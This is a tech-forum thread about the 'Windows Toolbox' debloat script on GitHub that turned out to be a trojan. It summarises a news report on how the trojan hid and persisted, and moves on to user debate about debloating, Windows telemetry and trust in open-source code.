Popular Windows tweak/privacy/debloat tool turned out to be a trojan.

[GoodBytes]

Delivered via GitHub, the popular Windows tweak tool who promises to offer privacy, debloat the system, and offer system tweaks, including adding Google Play Store to Android turned out to be Trojan.

 

Named, Windows Toolbox, and now removed from GitHub, it has been found to deliver more than expected on users PC. It add malware to the system.

bleepingcomputer.com reports:

Quote

Once tech sites discovered the script, it was quickly promoted and installed by many.

However, unbeknownst to everyone until this week, the Windows Toolbox was actually a Trojan that executed a series of obfuscated, malicious PowerShell scripts to install a trojan clicker and possibly other malware on devices.

Over the past week, various users shared the discovery that the Windows Toolbox script was a front for a very clever malware attack, leading to a surprisingly low-quality malware infection.

While the Windows Toolbox script performed all of the features described on GitHub, it also contained obfuscated PowerShell code that would retrieve various scripts from Cloudflare workers and use them to execute commands and download files on an infected device.

 

In summary, the way it worked is by taking advantage of Cloudflare special header support to get scripts which the author distributes and acquired by the script all obfuscated on the source code so the none keen eye, who doesn't have a complete understanding in the various languages used in this project, can quickly detect something is not right. The effect is not right away visible to the user. It leverages Windows Task Schedule to execute admin level script to do its work in doing its damage later on. 

 

The following Task Schedule items were found to be part of this trojan:

Quote

Microsoft\Windows\AppID\VerifiedCert
Microsoft\Windows\Application Experience\Maintenance
Microsoft\Windows\Services\CertPathCheck
Microsoft\Windows\Services\CertPathw
Microsoft\Windows\Servicing\ComponentCleanup
Microsoft\Windows\Servicing\ServiceCleanup
Microsoft\Windows\Shell\ObjectTask
Microsoft\Windows\Clip\ServiceCleanup

 

It also creates a hidden folder 'systemfile' under C:\ partition. And reroute Chrome, Edge and Brave web browser user profile there.

It also inject malicious Google Chrome / Chromium extensions to these web browsers. In addition, it reroute web traffic to variety of malicious sites.

 

GitHub has removed the project.

 

Source:

https://www.bleepingcomputer.com/news/security/windows-11-tool-to-add-google-play-secretly-installed-malware/

 

This highlights that you can't just blinding run script or programs online, even if they are open source unless you personally vetted the source code properly, and you fully understand what the program or script will do.

 

There is also a lot of miss information and myth going on about "debloating" and "privacy" from tools.

Not going in specifics, but "debloating" doesn't gain anything beside saving a few MBs of space from your drive out of your TB drive, or whatever drive capacity that you have plenty of, unless you screwed up and not got the right drive for your needs, or your budget limited you to a drive capacity that is barely enough and you need every single MB you can. And many times, scripts or programs just removes or encourages you to remove all in some ways, and that breaks ones OS experience. For example, removes the Store, ignoring the fact that some components of the OS and add-ons like video codecs, are being distributed via the Store, and some can be pre-requisites sometimes for OS update to install properly.

 

You want to save space? No problem! Just carefully know what you'll be removing and what impact, if any, it may entail.

 

Many freak out from Microsoft telemetry data, with many have wrong assumptions as they are reading click-bait articles instead of the source: Microsoft Windows Privacy Policy, which includes all included OS apps like Edge, OneDrive and the Store, and features like "find my pc". That said, I understand people wanting to turn it off, and I am all for options.

 

That said, many of these scripts I found over the years only set a registry value to 0 for a flag in the registry, thinking it means "disabled", as "0" tend to mean "off/disabled" in there, but that is wrong. There is no "off", 0 is a level of collection of telemetry which only works on Enterprise editions of Windows connected on a domain, if you put 0 on an unsupported edition of Windows, or Enterprise, but not domain join, then it will assume 1 in reality. As you can read here: https://docs.microsoft.com/en-us/windows/privacy/configure-windows-diagnostic-data-in-your-organization. And this is problem, as it gives the illusion of privacy gain, but in reality, it is not the case. And that is the problem I want to highlight.

 

Many of these tools and scripts, maybe even from known companies (I didn't test them to confirm, not saying that they aren't working), typically are not carefully vetted features that has been validated. They just collect stuff they find online and put a nice GUI on it and call it a day. Or some of the features used to work for Windows 10 early days, and assume to continue to work today. That is my point.

 

Even open source projects I seen, none have validation tests in them to confirm things are working or not. Just does stuff to the system, and hope what they found online is correct today, if ever.

 

Point is, best to do it all yourself and read documentation before doing things in the registry.

 

[darknessblade]

Until this post I never heard of said Piece of software.

 

I tried a few times to Debloat it manually using powershell [in a VM], but my .bat script I created Destroyed the VM instead, due removing too much of the programs.

 

[emosun]

The only way you'll know if windows 10 has been debloated is if almost every feature is seriously broken or non existent to the point of it being borderline windows 95. Basically almost everything in the os should be made up of broken directory links that go nowhere. Then it's good to go lol

[Levent]

This pleases me.

[BlackCipher]

I am not surprised that stuff like this is happening. I had to De-Bloat my Windows laptop yesterday and find reputable program. I usually do my own research or listen to what an expert has to say to reduce risk. A lot of the De-Bloat programs are sketchy and I doubt people go through and look at the code. The YouTuber, Mental Outlaw, reviewed a De-Bloater that I used previously so I would recommend looking him up.

[Vishera]

47 minutes ago, emosun said:

The only way you'll know if windows 10 has been debloated is if almost every feature is seriously broken or non existent to the point of it being borderline windows 95. Basically almost everything in the os should be made up of broken directory links that go nowhere. Then it's good to go lol

This is kind of what i did.

I broke lots of stuff debloating the OS,

I completely removed everything i could,so no Microsoft store or XBOX stuff and other crap on my system

 

I "upgraded" from Windows 7 this year.

The UI and user experience is still superior on 7.

[RejZoR]

This wouldn't have happened if OS wasn't so full of absolute trash no one asked for. This is literally problem that Microsoft itself created with their arrogance and incompetence.

[GoodBytes]

12 minutes ago, RejZoR said:

This wouldn't have happened if OS wasn't so full of absolute trash no one asked for. This is literally problem that Microsoft itself created with their arrogance and incompetence.

This was something done for years. Even back in XP days.

People removed calculator and notepad and such.. cause "it's not gaming related". So, I disagree.

And again, all you are doing is saving a few MBs of drive space (make that KBs in XP days... but that was relative to the drive capacity of the time).

 

Also, under Windows 11 most apps are installed on demand (when you first click on it).

So they are "installed" but not really.

 

[Vishera]

1 hour ago, GoodBytes said:

Also, under Windows 11 most apps are installed on demand (when you first click on it).

So they are "installed" but not really.

There are a lot of stuff that come installed: Edge,XBOX stuff,Microsoft Store,Cortana,Telemetry,etc.

[Salv8 (sam)]

2 hours ago, emosun said:

The only way you'll know if windows 10 has been debloated is if almost every feature is seriously broken or non existent to the point of it being borderline windows 95. Basically almost everything in the os should be made up of broken directory links that go nowhere. Then it's good to go lol

yea! when i installed ltsc all it did was make a bunch of folders on my drive!

didn't even format the bloddy thing!

 

in all seriousness, if it's open source, have a look at the code, even if you don't speak programer it's still a good idea to figure out what it's doing BEFORE you run it on your system

[GhostRoadieBL]

Thought this was WindowsDebloater at first but checked on task scheduling and searched hidden folders but my system seems to be in the clear.

 

[GoodBytes]

15 hours ago, Vishera said:

There are a lot of stuff that come installed: Edge,XBOX stuff,Microsoft Store,Cortana,Telemetry,etc.

Well, Edge is needed. Even Linux distros includes a web browser of some kind.

 

The Store is needed as well. It maintain built-in applications, fetches video codecs as needed, and updates some OS components avoiding going through Windows Updates (which is often blocked by IT to be controlled, and these situations you have these IT staff think they magically know more than Microsoft, and decide what to release or not, and issues arrive, and blame on Microsoft. 'cause they are perfect, and well, clearly know Windows more than Microsoft).

 

Cortana. Yes. I agree. And no reason why it can't be uninstalled, especially today where Cortana is gone. All it's features disabled/removed.

So why the app? Under Windows 11, it can be uninstalled via winget (winget uninstall Cortana), but why it isn't doable via Installed App section / right-click > Uninstall. I can understand it was missed at Windows 11 release, being rushed, but it's still not the case under the Insider program to my knowlege.

 

OneDrive, well, I guess it should be an option at startup. But considering that most people have Office 365 which does have OneDrive integration, there is a good chance that it is being used by most.

 

XBox, sure. But that isn't running on the back. If you don't use it, well, it's a few MB of drive space saved.

[Vishera]

3 minutes ago, GoodBytes said:

Well, Edge if needed. Even Linux distros includes a web browser of some kind.

I downloaded a different browser and got rid of it. 

Also Internet Explorer is still there (It's is to enable it) so it can be used to download the browser of your choice.

4 minutes ago, GoodBytes said:

The Store is needed as well. It maintain built-in applications,

I removed those

4 minutes ago, GoodBytes said:

fetches video codecs as needed, and updates some OS components

You can do that through the Windows update service,

In fact i downloaded a language pack that way without the store.

[GoodBytes]

19 minutes ago, Vishera said:

I downloaded a different browser and got rid of it. 

Hehe.

 

19 minutes ago, Vishera said:

Also Internet Explorer is still there (It's is to enable it) so it can be used to download the browser of your choice.

I removed those

You can do that through the Windows update service,

In fact i downloaded a language pack that way without the store.

Well, IE is no longer part of Windows 11. If you check under Settings or Optional Features panel, it's not there under Windows 11.

All you have is "Internet Explorer Mode" which requires Edge to be installed, where it is Chromium Edge but offers the ability to switch engine to IE on select pages, and comes with limitations over the real IE. This add-on is 281KB. It is not installed by default.

 

The store delivers updates to language packs. And they are updates mainly for: Typos and explanation improvements. Granted for English and other major global languages that is less of a concern, but some members here can share their issues that they noticed in their languages. I recall a few complained.

[emosun]

3 hours ago, Vishera said:

I "upgraded" from Windows 7 this year.

The UI and user experience is still superior on 7.

same.

I only use 10 becuase 7 doesn't work on the newer machine i bought but its windows 10 ameliorated. But yeah windows 7 is still much better than stock 10. Although 10 on my new machine is so empty it's pretty similar to 7 and pretty snappy all things considered.

[Doobeedoo]

Welp, it seems always better to do most things manually if you're not sure about certain programs. Shame these are even needed.

[Lightwreather]

Quote

What we know is that the malicious scripts only targeted users in the US and created numerous Scheduled Tasks with the following names:

Anyone know why this is the case? I mean, from what I can tell this trojan was used to essentially generate revenue from affiliate links, so why just the US?

[Guest]

16 hours ago, GoodBytes said:

For example, removes the Store, ignoring the fact that some components of the OS and add-ons like video codecs, are being distributed via the Store, and some can be pre-requisites sometimes for OS update to install properly.

 

I think I don't need the Microsoft store to just download codecs when I could just download the latest K-Lite codec pack and be done with it.

[Murasaki]

I never cared enough to use such tools, glad I didn't.

[Error 52]

Debloater scripts are always begging for trouble. Like, yeah, Microsoft can be a bit annoying with all their Edge/OneDrive shit sometimes but these scripts are genuinely responsible for, like, 90% of Windows problem reports online, I swear. (Stop trying to remove the fucking Microsoft Store and getting mad when the Xbox app doesn't work anymore, you goddamn idiots.)

 

The telemetry isn't that bad guys, I swear.

[Arika]

This will always be a major downside of open-source software, everyone can check the code, so people assume others have checked it to make sure it's not malicious.

[CTR640]

15 hours ago, emosun said:

same.

I only use 10 becuase 7 doesn't work on the newer machine i bought but its windows 10 ameliorated. But yeah windows 7 is still much better than stock 10. Although 10 on my new machine is so empty it's pretty similar to 7 and pretty snappy all things considered.

Been using W7 since 2014 with the same CPU and my use for such system haven't given me any reason to "upgrade" to W10 or 11.

W7 is simply easy to use, much less intrusive and no shitload of useless apps. The only one hardware that's been upgraded in 2018 is from GTX780 to 1080Ti and todays, still so far good. I'm literally like: if works, don't fix (or change). Even my sister likes my PC with W7 than their laptops with W10 lol

[Guest]

On 4/16/2022 at 10:42 PM, Arika S said:

This will always be a major downside of open-source software, everyone can check the code, so people assume others have checked it to make sure it's not malicious.

I think this malware relied on the (understandable) laziness of people not actually checking the scripts to see if it's malicious or not in the first place. It worked for them, the perpetrators, for a while, until months later when smarter people discovered malicious code within the software.

 

The malware would have just stayed for much longer if it were proprietary, however.

 

I'm also pretty sure people who will download these "windows debloater" software are just novices who don't understand how to actually set up Windows correctly either. They are easier targets than power users.

 

Also, I'm pretty sure most power users won't migrate to Windows 11 too early.

[Quackers101]

when both ways destroys your OS, try it manually or from others.

But still will break features that microsoft have hard-wired into other systems.

 

Glad I didn't use any of them, but some of them seemed interesting. Some is not just trying to remove MBs of data, but also remove useless or data collection softwares. then again as said before, some are just hard-wired in that you need a better solution to deal with some of them. Also that microsoft is just going to re-add a lot of stuff when updating your OS again. Having a manual "debloat" script does sound nice though and if one would be able to adjust for better security too.

On 4/16/2022 at 2:38 PM, Error 52 said:

The telemetry isn't that bad guys, I swear.

That is what an western spy would say!

Edited April 18, 2022 by Quackers101

[LAwLz]

13 hours ago, Grand Admiral Thrawn said:

Trust, but verify.

And let's not forget that the alternative is "trust, and no way of verifying".

I will rather take "the ability for someone to verify that the code is safe" over "nobody has the ability to verify it".

 

 

Anyway, my take is that if Microsoft implemented these features themselves rather than push people to use third party tools then this would not have happened.